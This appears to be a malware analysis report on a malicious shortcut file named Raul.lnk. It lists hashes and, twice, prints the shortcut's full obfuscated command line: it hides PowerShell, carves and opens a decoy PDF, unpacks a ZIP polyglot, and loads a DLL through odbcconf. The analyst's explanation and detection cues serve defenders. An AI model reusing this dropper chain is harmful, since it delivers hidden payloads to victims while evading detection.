| Hash | Hash Value |
|---|---|
| MD5 | cc4f9624f5b3645c62bbaff154594398 |
| SHA1 | c34a9c256e7b3f364014da1ff60d54da113229b2 |
| SHA256 | 8f374c1c525207b56f0ac6e5ca3618772b6013717e59f29151d685f4d1cea7af |
| SHA384 | 918c59fc54224de2ba0772be4db22fac7b6aa51e69f7644fb6ffca891565f94eae46cfef7d609a444a8da84df3e380e0 |
| SHA512 | a033f4ca85ab979c9574c893810a40fd4be307b5227f30cd6179658120d851b695d3f66d095e541afcc07883c02632bc8c29968ec36f0ed4ece669cc8ee19905 |
| SSDeep | 24576:n6Ohw6hcMFpatLsNP6UdeMCOeIXgk1Gk3f6IV:6+HhcMFpatLst6We031bj |
| TLSH | D01523150CFED9A0AD7D8510BA19AAE21B1E5F2F28077D4F903CBE4D3FD7A80250566B |

| Name0 | Value |
|---|---|
| PDF @0x000010BF | 1.5 |
| PDF @0x000010BF | Microsoft® Word 2016 |
| PDF @0x000010BF | Microsoft® Word 2016 |
| PDF @0x000010BF | Microsoft® Word 2016 |
| PDF @0x000010BF | Microsoft® Word 2016 |

The `@0x000010BF` offset on every row means a PDF header was detected 0x10BF (4287) bytes into the sample, i.e. the shortcut file carries an appended PDF document (version 1.5). This matches the `%PDF` marker that the embedded command below searches for before carving the decoy out of the LNK. The PDF field names were lost in export; the repeated "Microsoft® Word 2016" value is presumably the document's Creator/Producer metadata.

| Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='ssf.zip';$pd='Raul.pdf';$pdl='Raul.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr "$F\sst" `} ; |

What the shortcut's command line does, as far as the visible text shows: the `FOR /F` loop reads the `PSModulePath` environment variable (`set|findstr PSM`) and, by splitting on `s` and `\` and taking the fourth token, appears to derive the string `PowerShell` without it ever appearing literally in the LNK; that executable is then launched with `-w 1` (hidden window) and the PowerShell script as its arguments. The script locates `Raul.lnk` (falling back to a recursive search of `%TEMP%`), carves everything from the first `%PDF` marker into `Raul.pdf`, opens that PDF as a decoy, deletes the LNK, copies the PDF to `%LOCALAPPDATA%\PDFs\ssf.zip` and runs `Expand-Archive` on it — so the carved PDF must also be a valid ZIP archive (a PDF/ZIP polyglot) — then deletes the ZIP and invokes `odbcconf /a {regsvr "<dir>\sst"}`, which loads the extracted `sst` file as a DLL and calls its `DllRegisterServer` export via a signed Microsoft binary. Detection cues that follow directly from this chain: `conhost.exe --headless` spawning `cmd.exe` from a shortcut, PowerShell started with `-w 1`, `Expand-Archive` of a `.zip` under `%LOCALAPPDATA%\PDFs`, and `odbcconf.exe` with a `regsvr` argument pointing at an extension-less file in a user-writable directory. The contents of `sst` are not part of this report and are not described here.

| Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='ssf.zip';$pd='Raul.pdf';$pdl='Raul.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr "$F\sst" `} ; | Malicious |
Relationship chain as exported: `cc4f9624f5b3645c62bbaff154594398 > 66c3d1cd6b3835c0c756c08abb52012e5bec6b1d9a637dccbe488e4d921b34d3 > Raul.lnk`. Note that the SHA-256 in this chain (`66c3d1cd…`) is not the SHA-256 of the analysed sample listed above (`8f374c1c…`), so it refers to a related object — presumably a parent container or an extracted component — rather than to this file; confirm which with the source tooling before treating it as an indicator on its own.